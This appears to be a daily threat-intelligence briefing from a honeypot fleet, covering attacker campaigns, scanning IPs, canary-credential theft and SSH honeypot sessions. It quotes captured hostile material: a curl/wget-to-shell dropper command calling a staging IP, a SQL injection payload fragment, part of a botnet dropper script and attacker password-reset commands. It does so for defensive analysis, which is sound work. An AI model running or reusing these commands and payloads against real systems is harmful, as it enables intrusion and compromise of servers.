FLUX FLEET — INTEL BRIEFING №23

Period: 2026-09-16 07:34 – 2026-09-17 07:34 UTC (24h digest window, day 22 of operations)
Sources: 7 honeypot nodes — canary-farm-1 (EU-hot), ai-devbox-1 (EU), control-1 (Middle East), ru-edge-1 (Russia), netcup-ts + sponge-01-ts + frantech-ts (deception-only, no canaries)
Confidence: High (direct observation, 22-day baseline, every result-tag spike attributed by spot query)

BLUF

Two new hostile operator sets carried the window. A 12-IP cluster on sponge-01-ts (23.94.155.0/24, ColocCrossing/Latitude.sh, all first-ever) ran a 7-minute config-and-login sweep at 07:24–07:31 UTC with the AKAMAI-CONFIG adminer shape (joomla_app + 22-char password) and drove sponge's +26% volume. INFOCREST-KIT returned under its first residential operator: 41.249.4.249 (Office National des Postes, MA) ran the full kit on ai-devbox-1 — adminer prod_rw POSTs, wp-batch SQLi byte-identical to the template, phpMyAdmin enum, config-bundle walk — and minted 3 canaries. CREDSWEEP returned named: 102.220.161.102 (VPS Dedicated LLC, SI, sibling of №13's .87) ran the identical 511-path .env census on farm+aidev, 2 rejected mints.

The frantech-ts fleet overview cell is a two-actor artifact, not a fleet shift: 23.234.119.20 (tzulo, US) and 138.199.6.195 (Datacamp, CH) each replayed the same 12,949-path IoT dropper-URL dictionary in 2–3 minute waves (+1401% to 27,839 events; 26k of it is these two). The Pfcloud MALWARE-DICT-2 loop stayed continuous on control+ru-edge (3,142 window events, wordlist grown 567→573 paths). Mint economics improved: 52 credentials to 29 collectors, 17 upstream rejections, failure ratio 0.33:1 — best measured window since tracking began. Zero AWS use for a fifth window.

Key Judgements

  1. The 23.94.155.x cluster is a config-harvest operator, not a scanner. 12 first-ever IPs from one /24 hit sponge within 7 minutes: 23.94.155.31 ran a 53-path .env fanout plus AwsConfig.json/sendgrid.json/parameters.yml census and webshell probes; .17 posted adminer credentials (joomla_app + 22-char password blHaMJ2jmTV9e6SXlRTjyA — the AKAMAI-CONFIG shape from №12); .38 walked 10 phpMyAdmin variants; .32 ran the wp-batch SQLi body. (High confidence — shape match verified per IP; the 7-minute clustering and per-actor leg separation show orchestration, not coincidence.)
  2. INFOCREST-KIT acquired its first residential operator and a WHM leg. 41.249.4.249 (ONP MA — NightAgent's home ISP, different AS) ran: fake-git walk → WHM/cPanel probes → form login → wp-batch SQLi → 3 /.env mints → config-bundle census → /..;/ Tomcat bypasses → phpMyAdmin → adminer prod_rw POSTs with 3 rotating passwords. (High confidence on template match — body bytes identical to the registered wp-batch SQLi; Moderate on campaign name — the WHM leg belongs to REGISTRY-HUNT's walk, so this operator blends two commodity kits.)
  3. Attribution fix holds; one actor tried to defeat it. 0 empty-clientIp rows in 24,236 post-fix rows fleet-wide. The new xffPeerMismatch counter caught a real forgery: 179.43.134.114 (Private Layer, CH) sent 2 requests to sponge with X-Forwarded-For naming Cloudflare addresses (172.65.98.125, 162.158.174.6) — attribution laundering, first hostile use of the counter. (High confidence — socket peer and XFF disagreement logged on both rows.)
  4. The frantech volume spike is dictionary replay, twice. Two first-ever IPs each replayed one 12,949-path IoT dropper dictionary (23.234.119.20 in 52 s; 138.199.6.195 in 89 s), sharing all 12,949 paths and a 208-UA IoT rotation; 304 paths overlap MALWARE-DICT-2's list. (High confidence — path-set intersection = 12,949 of 12,949.)

Active Campaigns (day 22 status)

AKAMAI-CONFIG ⚠ NEW OPERATOR CLUSTER (23.94.155.0/24, sponge-01-ts)

  • Actors: 12 first-ever IPs, ColocCrossing/Latitude.sh (US). Splits by leg: .31 (env fanout + config JSONs + webshell probes), .17 (adminer joomla_app + blHaMJ2jmTV9e6SXlRTjyA), .38 (phpMyAdmin enum), .32 (wp-batch SQLi), .13/.18/.37/.20/.26/.27/.33/.24 (single-path python-requests tarpit probes).
  • TTPs: 53-path .env directory fanout (first-seen paths /admin-app/.env, /private/.env, /apps/.env, /config/config.json, /AwsConfig.json, /sendgrid.json, /deployment-config.json, /credentials/config.json, /parameters.yml); adminer credential POST shape identical to №12's AKAMAI-CONFIG (joomla_app username, 22-char password); phpMyAdmin 10-path login enum; one wp-batch SQLi POST; forged Chrome/105/106 + Firefox/105 UAs per leg.
  • Assessment: The №12 single-IP template now runs as a multi-actor cluster with per-leg IP separation. Same campaign, bigger footprint: what one Akamai IP did on both EU nodes in 20 min, this set did on one node in 7 min. Watch for the cluster on other nodes and for a mint attempt — 0 mints so far.

INFOCREST-KIT ⟳ FIFTH OPERATOR (41.249.4.249, ONP MA) — ai-devbox-1

  • Actors: 41.249.4.249, AS36903 Office National des Postes (Maroc Telecom) — first INFOCREST operator on residential Moroccan infrastructure; prior operators were US hosting (Infocrest, HostRoyale) and EU VPS. Same ASN family as NIGHTAGENT's six IPs; no shared TTP with NightAgent.
  • TTPs: 377 events in 6 min: fake-git walk → /whm + /openid_connect/cpanelid (REGISTRY-HUNT leg) → user=root&pass=wrong form login → wp-batch SQLi (author_exclude=0) UNION SELECT...CONCAT(0x7c7c,HEX(CAST((SELECT 0x4b4b)AS CHAR))...) byte-identical to the standing template → 3 /.env mints → 60 config-bundle JS paths → /..;/env*.js Tomcat bypasses → phpMyAdmin 10-path enum → 9 adminer POSTs, prod_rw with rotating passwords RRLY6MiJE3TOur-txM79Yw, 6t9UK7jreHan3rAzXiVyDw, D9bYKfOlmWdaEjO6_gnaMQ.
  • Assessment: The kit's template survives operator rotation (5 IPs over 6 windows), now from residential space where blocklisting is hard. The mint haul (3) is the campaign's first since №13's 1-mint runs. The composite WHM leg suggests kit-sharing or a merged operator playbook.

CREDSWEEP ⟳ RETURN, NAMED (102.220.161.102, VPS Dedicated LLC SI) — farm + aidev

  • Actors: 102.220.161.102 (511-path census on canary-farm-1 00:11–00:26 and ai-devbox-1 23:52–00:05, 514+514 events, identical path sets). Sibling .87 (№13 operator; 511/511 path overlap with .102's set) and .139 (№22, 2 mints) are standing in the same /24.
  • TTPs: The full 511-path .env-variant census (511/511 overlap with .87's list), Chrome/126.0.0.0 exact UA, pacing 15 min/node; webshell-sweep, yii2-debug, sftp-config families all present; 2 mint rejections (one per node).
  • Assessment: The №13 campaign's wordlist now runs under a second named block IP. The VPS Dedicated /24 holds 3 operators and 5 all-time mints with zero observed use.

LIBREDTAIL-KIT ⟳ NINTH WINDOW, WIDEST SPREAD (17 operators, all 7 nodes)

  • Actors: 17 IPs, all fresh: 103.46.186.85, 106.63.14.150, 109.238.140.87 (netcup ×5), 129.121.128.70, 129.204.31.138 (Tencent CN — new), 144.172.105.41, 159.89.133.65, 2.29.38.95, 144.225.6.182, 212.227.98.3, 223.123.65.54, 37.221.113.13, 45.43.37.254, 60.12.44.234, 88.218.94.33, 165.99.207.153, 125.247.51.6.
  • TTPs: Unchanged chain — md5("Hello PHPUnit") probes across eval-stdin permutations, then POST /index.php with shell_exec(base64_decode(...)) (ed25519 key echo), then the dropper. Every run captured: (wget --no-check-certificate -qO- https://217.60.103.56/sh || curl -sk https://217.60.103.56/sh) | sh -s apache. Staging host 217.60.103.56 unchanged for a third window.
  • Assessment: One run per IP, ~40 s each, honest libredtail-http UA, zero credential interest. The fleet's most consistent RCE-probing campaign; body capture (17/17) now stable after the №22 feed fix.

MALWARE-DICT / MALWARE-DICT-2 ⟳ (Pfcloud loop + synchronized IoT replay + frantech mega-dictionary)

  • Actors: 204.76.203.18 (Pfcloud UG, NL) continuous on control+ru-edge: 3,142 events / 573 paths — the wordlist grew again (567→573). 23.234.119.20 (tzulo, US) and 138.199.6.195 (Datapacket/Datacamp, CH) each ran the 12,949-path dictionary on frantech (2,589 s of combined replay, 208 rotating IoT UAs, 27.3k not-handled); 304-path overlap with MALWARE-DICT-2's list.
  • TTPs: Dropper-URL GET dictionaries at arch-suffix fanout (/bins/*.{arm,mips,mpsl,ppc,sh4,x86…}, /cloud/form_NNNNN.pdf.ps1, /atomic/, /nullnet_bin_dir/); 2 trap-family probes each (exchange-powershell-pre-auth, llm-endpoint-ollama-ps, gravitysmtp-miss, observability-profiler-index — 2 events each, 0 mints).
  • Assessment: The 12,949-path list is a new dictionary record for a single replay (previous record: OMEGA-SWEEP's 1,042). Two hosts, one list, 15 h apart — the same operator tooling running twice. The Pfcloud loop's wordlist growth continues.

REGISTRY-HUNT ⟳ (LeakIX) — farm + aidev, 22 IPs, 18 mints

  • Actors: 22 l9scan IPs, all DigitalOcean; UA variants 2.0.234313… (farm) and 2.0.632323… (aidev) stable since №15.
  • TTPs: Unchanged 12-step WebLogic→Confluence→WHM→Docker-registry walk; 18 /.env mints at 41 events per IP.
  • Assessment: Volume returned to №15-wave scale (566+527 events) after №22's 16-IP wave. 1 mint per IP continues; the service's mints-to-date now exceed 60 all-time with zero observed use.

Standing actors (persistence check)

  • 80.94.95.211 (SS-Net RO) — aidev 42 ev + ru-edge 42 ev, 6 mints (3+3), 38 paths. Eleventh window in twelve; the №16 shared-wordlist link to Feo Prest .175 holds (identical 49-path core).
  • 213.209.159.175 (Feo Prest DE) — farm 93 ev + control 86 ev across 6 passes (Safari 5.1.5, Firefox 3.5.4 SUSE, iPad 6.0, Chrome/51), 8 mints (4 farm + 4 control). Heaviest mint day for this operator; 19 all-time.
  • 94.154.46.247/.250/.244 (Omegatech, OMEGA-SWEEP /46) — control 1,042 paths (1,050 ev, 6 mints) at 04:01; .250 ran the 743-path core on control (750 ev, 5 mints) at 12:34; .244 ran the 150-path pass on frantech (07:01). First named runs since №22's wave; hoard now 24+ window creds with zero use.
  • 69.5.20.14 (Byteplus, ALIYUN-PROBE) — frantech 960 ev + control 915 + aidev 926, unchanged 9-UA rotation and /.aliyun/* sweep, 4 mints (2 aidev, 2 control).
  • 176.65.148.71 — control /.env mint (Chrome/124) 17:48; sibling .184 on ru-edge hit /xmlrpc/2/common (22:34). The 4-window single-purpose collector streak continues (4 all-time mints).
  • 195.178.110.159 (Techoff SRV NL) ⚠ NEW — 295 events/199 paths in 106 s on aidev: 242 fake-git + 43 fake-git-miss, honest curl/7.81.0, 2 mint rejections, 1 aws-credentials-file-error. Git-internals walker from the same org as the TECHOFF kit's standing .204. Same-org new IP 45.148.10.95 (148 events, Firefox/91 + empty UA, fake-git census ru-edge+farm) — the git-walk template now has two fresh Techoff IPs.
  • 209.159.155.142 (Interserver US) ⚠ NEWgit/2.39.0 UA, 16 paths: /.git/HEAD, /.git/config, and a full /.git/hooks/ enumeration (16 hook names), 350 events across farm+aidev over 25 h, 63 fake-git/273 fake-git-miss. Hooks enumeration is a GIT-VAULT-family shape.
  • 45.156.128.x/129.x (WP-ENUM generation 2) — farm .37 (44 ev) + .129 (27 ev) and sponge .46 (42 ev) + .133 (29 ev) all ran the plugin readme.txt census + wp-rest-index probes, 0 mints. Third consecutive window with this block active.
  • Absent: METADATA-HUNT (0 /@fs, 0 __aws_leak_probe rows — second consecutive idle window since the 8.234.173.27 run), ENV-CENSUS-3/4, NIGHTAGENT (sixth idle), XMLRPC-BRUTE (1 stray /xmlrpc/2/common GET, no POSTs), CRUSADER-SWEEP (seventh idle), CURL-SWEEP (sixth miss).

Fleet Observations

Canary credentials

Summary

No canary credentials were used in AWS during the window. Fleet sensors minted 52 credentials to 29 collector IPs; none reached AWS.

Mint → use funnel

Metric Count
Credentials minted (fleet, window) 52
Distinct collector IPs 29
Credentials used in AWS (alerts) 0
Credentials stolen, no observed AWS use in window 52

Per collector (evidence for attribution prose — join each IP against ip-journey and the campaign registry):

Theft IP Sensor Mints (window) Creds used in AWS Use IPs Operations Mint history (6d)
94.154.46.250 control-1 5 0 0 5 mints since 2026-09-16 12:34
213.209.159.175 canary-farm-1 4 0 0 11 mints since 2026-09-10 22:43
213.209.159.175 control-1 4 0 0 11 mints since 2026-09-10 22:43
41.249.4.249 ai-devbox-1 3 0 0 3 mints since 2026-09-17 03:54
80.94.95.211 ai-devbox-1 3 0 0 9 mints since 2026-09-10 11:06
80.94.95.211 ru-edge-1 3 0 0 9 mints since 2026-09-10 11:06
157.245.105.107 ai-devbox-1 2 0 0 2 mints since 2026-09-16 19:57
159.89.12.166 canary-farm-1 2 0 0 3 mints since 2026-09-11 20:20
69.5.20.14 ai-devbox-1 2 0 0 4 mints since 2026-09-16 09:23
69.5.20.14 control-1 2 0 0 4 mints since 2026-09-16 09:23
102.220.161.139 ai-devbox-1 1 0 0 2 mints since 2026-09-15 21:00
134.209.25.199 ai-devbox-1 1 0 0 2 mints since 2026-09-15 21:06
138.68.144.227 ai-devbox-1 1 0 0 2 mints since 2026-09-15 21:40
138.68.86.32 canary-farm-1 1 0 0 2 mints since 2026-09-15 21:03
139.59.143.102 canary-farm-1 1 0 0 2 mints since 2026-09-11 20:36
143.110.213.72 ai-devbox-1 1 0 0 2 mints since 2026-09-10 20:31
143.244.168.161 canary-farm-1 1 0 0 1 mints since 2026-09-16 14:49
144.172.99.12 ai-devbox-1 1 0 0 1 mints since 2026-09-16 19:36
147.90.209.27 ai-devbox-1 1 0 0 1 mints since 2026-09-16 23:25
159.89.174.87 ai-devbox-1 1 0 0 2 mints since 2026-09-15 21:40
164.92.107.174 canary-farm-1 1 0 0 1 mints since 2026-09-16 15:16
165.227.173.41 ai-devbox-1 1 0 0 2 mints since 2026-09-11 20:20
167.99.181.249 ai-devbox-1 1 0 0 2 mints since 2026-09-15 18:13
176.65.148.71 control-1 1 0 0 3 mints since 2026-09-11 11:39
206.81.24.227 canary-farm-1 1 0 0 1 mints since 2026-09-16 19:29
209.38.248.17 canary-farm-1 1 0 0 2 mints since 2026-09-15 20:29
34.18.54.217 ai-devbox-1 1 0 0 1 mints since 2026-09-16 16:11
34.77.235.103 canary-farm-1 1 0 0 1 mints since 2026-09-16 17:43
45.148.10.5 ru-edge-1 1 0 0 1 mints since 2026-09-16 17:10
57.154.242.54 ai-devbox-1 1 0 0 1 mints since 2026-09-16 14:23
64.226.65.160 canary-farm-1 1 0 0 3 mints since 2026-09-15 20:17
64.23.218.208 canary-farm-1 1 0 0 2 mints since 2026-09-11 20:36

Persistent collectors with no observed AWS use (candidates for hoard/resale/untraced use — check prior briefings for named campaigns):

  • None: 46 mints, 2026-09-12 08:14 → 2026-09-15 10:51
  • 136.117.52.210: 26 mints, 2026-09-14 00:41 → 2026-09-14 00:41
  • 34.32.131.244: 25 mints, 2026-09-11 21:44 → 2026-09-11 21:44
  • 94.154.46.249: 12 mints, 2026-09-11 13:47 → 2026-09-11 13:48
  • 213.209.159.175: 11 mints, 2026-09-10 22:43 → 2026-09-17 06:28
  • 94.154.46.242: 10 mints, 2026-09-15 15:58 → 2026-09-15 15:58
  • 94.154.46.243: 10 mints, 2026-09-15 20:50 → 2026-09-15 20:50
  • 94.154.46.245: 10 mints, 2026-09-10 16:25 → 2026-09-10 16:25
  • 94.154.46.246: 10 mints, 2026-09-12 04:12 → 2026-09-12 04:13
  • 80.94.95.211: 9 mints, 2026-09-10 11:06 → 2026-09-17 01:09
  • 129.222.206.62: 8 mints, 2026-09-15 18:35 → 2026-09-15 21:40
  • 8.234.173.27: 7 mints, 2026-09-16 00:03 → 2026-09-16 00:03
  • 94.154.46.247: 6 mints, 2026-09-16 04:01 → 2026-09-16 04:02
  • 94.154.46.250: 5 mints, 2026-09-16 12:34 → 2026-09-16 12:34
  • 136.70.175.146: 4 mints, 2026-09-12 06:33 → 2026-09-12 06:33
  • 160.177.217.115: 4 mints, 2026-09-11 21:02 → 2026-09-11 21:43
  • 167.99.79.44: 4 mints, 2026-09-11 18:18 → 2026-09-11 18:19
  • 69.5.20.14: 4 mints, 2026-09-16 09:23 → 2026-09-16 15:50
  • 159.89.12.166: 3 mints, 2026-09-11 20:20 → 2026-09-16 21:07
  • 176.65.148.71: 3 mints, 2026-09-11 11:39 → 2026-09-16 17:48
  • 41.249.4.249: 3 mints, 2026-09-17 03:54 → 2026-09-17 03:55
  • 64.226.65.160: 3 mints, 2026-09-15 20:17 → 2026-09-16 21:06

Mint economics and attribution

52 flux issued rows / 52 Tracebit credentials to 29 collectors; 17 upstream 400 rejections (aidev 9, farm 6, control 2); failure ratio 0.33:1 — the best measured window since tracking began (№21's record was 11.6:1). The rejections spread thin: 14 IP-sensor pairs at 1 rejection each, led by 195.178.110.159 (2). Zero AWS use for a fifth window; the standing named-collector hoard grew to roughly 290 credentials.

The socket-peer attribution build held for a full cycle: 0 empty-clientIp rows in 24,236 post-fix rows fleet-wide. The new xffPeerMismatch counter fired on 5 rows: the 2 known deploy-check probes (70.8.208.88, /verify-forged//verify-chain) and 3 real forgeries — 179.43.134.114 twice (XFF claims Cloudflare IPs 172.65.98.125/162.158.174.6, path /tr, 8 h apart on sponge) and one metabase-cve-2026-72898-detect/1.0 self-labeled probe from 31.56.58.59 (FR) whose XFF agrees with its peer (not a forgery — counter semantics note: it appears in the mismatch list because the header names the peer exactly once; treat as benign-labeled research, 8 all-time rows on 2 sensors).

Fleet-side changes

None this cycle. The attribution fix and XFF counter deployed 09-15 remain verified in production.

SSH/telnet honeypot (frantech-ts — single sensor, not fleet-wide)

Funnel: 518 sources → 381 shells (74%) → 155 command-runners (41% of shell-getters, 30% of sources). Event level: 26,709 credential attempts → 17,933 accepted logins → 8,951 commands. Per-login conversion: 50% of accepted logins ran something, down from 67% in №22 but inside the normal band.

New commands (my count against the full hp history, per the day-file offset quirk: 8 of 32 distinct):

  • 132.243.164.33 (S.C. INFOTECH-GRUP, MD; root/123456, 1 login) — a botnet dropper script: #!/bin/sh wdir="/tmp" for i in "/dev/shm" "/tmp" "/var/tmp" "/home" "/root"; do touch "$i/test_exec" … chmod +x … followed by ls -la /var/run/gcc.pid — the gcc.pid check is the XOR.DdoS/Gagaviz lineage marker, first appearance in the hp corpus.
  • Password-reset loop continues, now the dominant first-command class — 4 first-time IPs, all chpasswd/passwd with fresh values: 172.172.180.124 (root:85pdj4ySlL3r), 114.80.39.74 (root:wGtHpucnHXD5, root:DNIhaL539cDo, server123/5WJqmVSGyFiE ×passwd), 106.75.153.103 (root:XGKUFUofCrNZ, 123456/GL3WBHlL6DD9 ×passwd). The №21-named persistence pattern is now the majority behavior for hands-on operators: recon, reset, plant key.
  • The 94.154.43.69 (Storm Industries) handshakebins.sh session from №22 did not repeat in-window (its 05:00 session sits in the №22 overlap; one telnet auth at hour 23).

Credentials: 11,734 distinct pairs offered, 0 new. Concentration unchanged — 345gs5662d34/3245gs5662d34 commodity family owns the top rows (1,187 + 853 + 58 + 51 attempts across usernames).

Gaps / Next Collection

  1. 23.94.155.x cluster follow-up: the /24 ran once on sponge with zero mints. If it returns on the canary nodes, its .env fanout will mint — watch for a mint wave under ColocCrossing/Latitude.sh and correlate with the AKAMAI-CONFIG adminer leg.
  2. 179.43.134.114 XFF laundering: 2 events on a single path is thin. If the socket-peer/XFF mismatch counter fires again for this peer or any new peer, pivot on socketPeer and treat the XFF chain as false attribution — collect the full journey before judging.
  3. AWS-use watch: 52 credentials to 29 collectors, hoard ≈290, five idle windows. The next Credential-Drain event is overdue by the №20 precedent (mint-to-use within 6 min). Check Tracebit alerts against the full credential TTL, not the flux window alone.
  4. Techoff git-walker growth: two fresh same-org IPs (195.178.110.159, 45.148.10.95) within one day of each other suggests a rotating pool behind the git-walk template. Track path-set overlap against GIT-VAULT's 128.24.167.75 corpus.
  5. frantech mega-dictionary: capture the full 12,949-path list offline (it replayed twice; both hosts may recur). A third replay would warrant promoting it to a campaign alongside MALWARE-DICT-2.